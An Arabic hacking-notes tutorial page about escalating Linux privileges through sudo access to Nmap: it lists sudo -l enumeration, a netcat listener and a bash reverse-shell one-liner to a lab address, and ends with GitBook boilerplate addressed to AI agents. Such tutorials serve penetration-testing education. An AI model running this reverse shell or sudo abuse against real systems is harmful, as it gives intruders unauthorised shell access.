> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-nmap-linux-privilege-escalation.md).

# sudo (Nmap) - تصعيد امتيازات لينكس

## ما هو

يبدأ تصعيد الامتيازات في sudoers بالأوامر التي يمكن للمستخدم تشغيلها عبر `sudo`. يمكن للثنائيات المهيأة بشكل خاطئ، ومعاملات البرامج النصية غير الآمنة، ومعالجة الروابط الرمزية، وإصدارات sudo الضعيفة أن تحول صلاحيات sudo المحدودة إلى غلاف root. تركز هذه الصفحة تحديدًا على **سودو (Nmap)** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
sudo -l
sudo --version
```

## أمثلة

استخدم الأمر التالي للتحقق مما إذا كان المستخدم لدينا يملك صلاحيات sudo:

```bash
sudo -l
```

<div data-full-width="true"><figure><img src="/files/8266f56bd4a7ace7347283e6905f548c0579cb8c" alt=""><figcaption></figcaption></figure></div>

إذا شغّلت مع **sudo -u jordan nmap** وإذا تم قبوله، فهذا يعني أنه لن يُطلب أي كلمة مرور، وسيُنفَّذ الأمر كمستخدم jordan:

<figure><img src="/files/02b124424433dbc66719aea469229d1900797614" alt=""><figcaption></figcaption></figure>

بحث [GTFOBins](https://gtfobins.github.io/) وقم بالتصفية حسب **Nmap**:

<figure><img src="/files/8c6ba2ae1b193fc01f3de24bfb9a7267446452fd" alt=""><figcaption></figcaption></figure>

أخيرًا، إذا نفّذنا الأمر التالي، فسنحصل على شل مثل Jordan

<figure><img src="/files/597e4b80fff95841736603aa4d9aa54667b1f598" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9bb73b6c7ac818be58d4d251f40e90b44588b613" alt=""><figcaption></figcaption></figure>

كما هو الحال مع nmap، عند الكتابة لا يظهر شيء. ما سنفعله هو الاستماع إلى Netcat من طرفيتنا:

```bash
nc -nlvp 443
```

وفي وحدة تحكم nmap، شغّل الأمر التالي للحصول على شل عكسي:

```bash
bash -c "bash -i >& /dev/tcp/192.168.71.128/443 0>&1"
```

<figure><img src="/files/39433dd0b19ffa893e7cd9662643857afbad31cd" alt="" width="563"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/sudoers/sudo-nmap-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
